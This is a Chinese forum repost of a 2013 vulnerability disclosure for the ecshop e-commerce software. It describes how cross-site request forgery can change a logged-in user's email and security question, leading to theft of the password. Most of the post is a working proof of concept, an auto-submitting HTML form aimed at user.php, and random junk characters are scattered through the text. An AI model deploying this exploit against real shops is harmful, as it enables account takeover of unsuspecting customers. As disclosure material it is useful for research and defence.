找回密码
 立即注册
查看: 2468|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
7 O" Y" L8 {$ ~& Q6 kecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现5 {6 z* B$ U$ w) O

0 S, H$ v: R& F2 R3 r; A8 V; K+ KDemo For:http://www.wooyun.org/bug.php?action=view&id=3953 V" T2 O8 n" p" a; y: }2 G3 D$ S6 ^

) h( u6 K$ b0 e1 q, ?- k详细说明:+ ~. c4 A* ]: C0 x! H$ t
利用csrf和xss可以突破官方所说的“障碍”
# `6 P; r1 }, q3 _xss版本已经有人说明
- ]0 P7 T# n$ z2 A1 j这里给出csrf版本- Z; G# n* ]& T$ d
6 V8 Z2 x% G+ r* ~  S
漏洞证明:3 V0 w* V$ W) S$ ^
<html>/ u4 P: x0 k6 M- F; |! b' N
<body>
7 Y! p+ F$ W' ~' r2 l<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
  Q1 H- ~4 w8 J1 V0 n<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">5 r8 n4 t! M* a' ^6 j* k3 a
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
9 C2 l) N) ^1 g3 ]<INPUT TYPE="text" NAME="sel_question" value="ecshop">3 t$ k% k% l( }$ d. B( c+ d7 Q% L
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">8 }$ w2 X  @. y" ]6 |1 E
</body>
$ U0 Q5 x4 C4 U& B5 R! |9 b8 l5 Z6 i<script>
& D& O* e3 J( ^* c3 Kdocument.forms[0].submit();
$ i5 W+ P2 j& R8 N5 W</script>
* P; k5 T, @1 g' b9 ~</html>  R* A! _  c/ k  q( ~! Z4 F
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失: J% D$ R, G% X* w1 C2 R
, h6 O! h& ~9 C. |. }, Y4 [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表